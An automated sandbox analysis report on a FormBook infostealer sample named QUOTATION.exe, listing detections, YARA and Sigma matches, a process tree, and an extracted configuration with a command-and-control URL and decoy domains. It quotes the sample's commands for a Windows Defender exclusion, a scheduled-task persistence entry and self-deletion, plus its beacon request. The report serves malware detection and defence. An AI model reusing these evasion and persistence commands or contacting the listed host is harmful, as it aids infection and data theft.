Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report QUOTATION.exe

Overview

General Information

Sample Name:QUOTATION.exe
Analysis ID:532906
MD5:213d8fd4b74e3b1122cfc1a9159aa579
SHA1:3fcea21ca260c922f371877bef1cec0b2293f1e9
SHA256:696ba286fa1d2d46b09dee92733f9ca34bfe3e58f50a440a3ec89f63bba76441
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Sigma detected: Suspicius Add Task From User AppData Temp
Modifies the prolog of user mode functions (user mode inline hooks)
Self deletion via cmd delete
.NET source code contains potential unpacker
Sigma detected: Powershell Defender Exclusion
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • QUOTATION.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\QUOTATION.exe" MD5: 213D8FD4B74E3B1122CFC1A9159AA579)
    • powershell.exe (PID: 7120 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 5516 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • QUOTATION.exe (PID: 6728 cmdline: C:\Users\user\Desktop\QUOTATION.exe MD5: 213D8FD4B74E3B1122CFC1A9159AA579)
    • QUOTATION.exe (PID: 5372 cmdline: C:\Users\user\Desktop\QUOTATION.exe MD5: 213D8FD4B74E3B1122CFC1A9159AA579)
      • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 3180 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
      • NETSTAT.EXE (PID: 5100 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
        • cmd.exe (PID: 6896 cmdline: /c del "C:\Users\user\Desktop\QUOTATION.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 6936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.purelai.store/p2r0/"], "decoy": ["armory-village.net", "gailgylee.store", "hyjqjd.com", "dgastudios.com", "freedomofspain.com", "coneofpositivity.com", "wesleyb.com", "cacciatorediteglie.com", "refatu.com", "apexfreightdispatch.com", "fichesdematerialisees.com", "hoopmetaverse.com", "gesogog.com", "mosaicelevatormonitoring.com", "mrstarrtutorsmath.com", "kebalunion.com", "xn--15qv36df6am25bt2p.top", "archedbeautynw.com", "glczklft.com", "zhejiang-huayang.com", "mariogriffinphoto.com", "metomecetefur.rest", "sabimode.com", "pityporg.online", "plumbinghelp411.com", "neontvplay.com", "hellofurb.com", "jamerah.com", "alarshllc.com", "secure2work.cloud", "wanderlustwallart.com", "altinayrent.com", "odishaparagliding.com", "jijijfiaf.xyz", "zaracentres.com", "shorthillsnjhomespecialists.com", "everdayevolution.net", "kpopyostore.com", "bitsandbuds.com", "dalstudio.net", "anh-law.com", "ecogreenhanukkah.com", "ittibrief.com", "itargetcampaigns.com", "abczqzhkmu.com", "dentistslexington.com", "searchinmetaverse.com", "mypharmatea.com", "omdeforoush.com", "bbtenzymes.com", "thefactologist.com", "mki-sb.com", "escrowtimeonline.com", "global-therm.com", "yourlifedesignjourney.com", "318donate.com", "montessori-academies.com", "virgotalk.com", "alvincjohnson.com", "hxcopymrerem.biz", "gslean.com", "darknessnft.com", "hummelconstrllc.com", "metaversefed.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x26b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x21a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x27b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x292f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x141c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x8927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x992a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      17.0.QUOTATION.exe.400000.6.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        17.0.QUOTATION.exe.400000.6.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        17.0.QUOTATION.exe.400000.6.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a49:$sqlite3step: 68 34 1C 7B E1
        • 0x17b5c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a78:$sqlite3text: 68 38 2A 90 C5
        • 0x17b9d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a8b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17bb3:$sqlite3blob: 68 53 D8 7F 8C
        17.0.QUOTATION.exe.400000.6.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          17.0.QUOTATION.exe.400000.6.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 17 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Suspicius Add Task From User AppData TempShow sources
          Source: Process startedAuthor: frack113: Data: Command: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp, CommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION.exe" , ParentImage: C:\Users\user\Desktop\QUOTATION.exe, ParentProcessId: 6924, ProcessCommandLine: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lQdAGavApIJoo" /XML "C:\Users\user\AppData\Local\Temp\tmp8E88.tmp, ProcessId: 5516
          Sigma detected: Powershell Defender ExclusionShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION.exe" , ParentImage: C:\Users\user\Desktop\QUOTATION.exe, ParentProcessId: 6924, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe, ProcessId: 7120
          Sigma detected: Non Interactive PowerShellShow sources
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION.exe" , ParentImage: C:\Users\user\Desktop\QUOTATION.exe, ParentProcessId: 6924, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exe, ProcessId: 7120
          Sigma detected: T1086 PowerShell ExecutionShow sources
          Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132829772743618324.7120.DefaultAppDomain.powershell

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.purelai.store/p2r0/"], "decoy": ["armory-village.net", "gailgylee.store", "hyjqjd.com", "dgastudios.com", "freedomofspain.com", "coneofpositivity.com", "wesleyb.com", "cacciatorediteglie.com", "refatu.com", "apexfreightdispatch.com", "fichesdematerialisees.com", "hoopmetaverse.com", "gesogog.com", "mosaicelevatormonitoring.com", "mrstarrtutorsmath.com", "kebalunion.com", "xn--15qv36df6am25bt2p.top", "archedbeautynw.com", "glczklft.com", "zhejiang-huayang.com", "mariogriffinphoto.com", "metomecetefur.rest", "sabimode.com", "pityporg.online", "plumbinghelp411.com", "neontvplay.com", "hellofurb.com", "jamerah.com", "alarshllc.com", "secure2work.cloud", "wanderlustwallart.com", "altinayrent.com", "odishaparagliding.com", "jijijfiaf.xyz", "zaracentres.com", "shorthillsnjhomespecialists.com", "everdayevolution.net", "kpopyostore.com", "bitsandbuds.com", "dalstudio.net", "anh-law.com", "ecogreenhanukkah.com", "ittibrief.com", "itargetcampaigns.com", "abczqzhkmu.com", "dentistslexington.com", "searchinmetaverse.com", "mypharmatea.com", "omdeforoush.com", "bbtenzymes.com", "thefactologist.com", "mki-sb.com", "escrowtimeonline.com", "global-therm.com", "yourlifedesignjourney.com", "318donate.com", "montessori-academies.com", "virgotalk.com", "alvincjohnson.com", "hxcopymrerem.biz", "gslean.com", "darknessnft.com", "hummelconstrllc.com", "metaversefed.com"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: QUOTATION.exeVirustotal: Detection: 40%Perma Link
          Source: QUOTATION.exeReversingLabs: Detection: 18%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://www.purelai.store/p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnXAvira URL Cloud: Label: malware
          Source: www.purelai.store/p2r0/Avira URL Cloud: Label: malware
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\lQdAGavApIJoo.exeReversingLabs: Detection: 18%
          Source: 17.0.QUOTATION.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.0.QUOTATION.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.2.QUOTATION.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.0.QUOTATION.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: QUOTATION.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: QUOTATION.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: netstat.pdbGCTL source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
          Source: Binary string: netstat.pdb source: QUOTATION.exe, 00000011.00000002.378505567.0000000000FA0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: QUOTATION.exe, QUOTATION.exe, 00000011.00000002.378532857.0000000000FB0000.00000040.00000001.sdmp, QUOTATION.exe, 00000011.00000002.378732031.00000000010CF000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000018.00000002.547801990.0000000003220000.00000040.00000001.sdmp, NETSTAT.EXE, 00000018.00000002.548437267.000000000333F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\QUOTATION.exeCode function: 4x nop then pop edi17_2_00416CEA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4x nop then pop edi24_2_00746CEA

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.purelai.store
          Source: C:\Windows\explorer.exeNetwork Connect: 208.51.62.42 80Jump to behavior
          Uses netstat to query active network connections and open portsShow sources
          Source: C:\Users\user\Desktop\QUOTATION.exeProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.purelai.store/p2r0/
          Source: global trafficHTTP traffic detected: GET /p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX HTTP/1.1Host: www.purelai.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: QUOTATION.exe, 00000001.00000002.299185343.000000000276E000.00000004.00000001.sdmp, QUOTATION.exe, 00000001.00000002.299134882.0000000002731000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: NETSTAT.EXE, 00000018.00000002.549103186.0000000003C3F000.00000004.00020000.sdmpString found in binary or memory: https://wildcard.hostgator.com/p2r0/?U2JXS=zl7ruCTqPiUCF1L
          Source: unknownDNS traffic detected: queries for: www.purelai.store
          Source: global trafficHTTP traffic detected: GET /p2r0/?U2JXS=kHZbGirW+rtifSnrplUrhxYS41BJcQ1JCeh0wMn6PQuFvfZqsbftW9WXbX4R7rV3sWuJ&cH=-ZeTxXnX HTTP/1.1Host: www.purelai.storeConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.QUOTATION.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.0.QUOTATION.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.QUOTATION.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.545684823.0000000000D50000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000013.00000000.332122675.000000000FD1B000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.545105999.0000000000730000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.376958826.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000000.296229460.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.378010421.0000000000B40000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000018.00000002.545541618.0000000000D20000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000000.295558217.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.300134534.0000000003739000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.378361969.0000000000F70000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
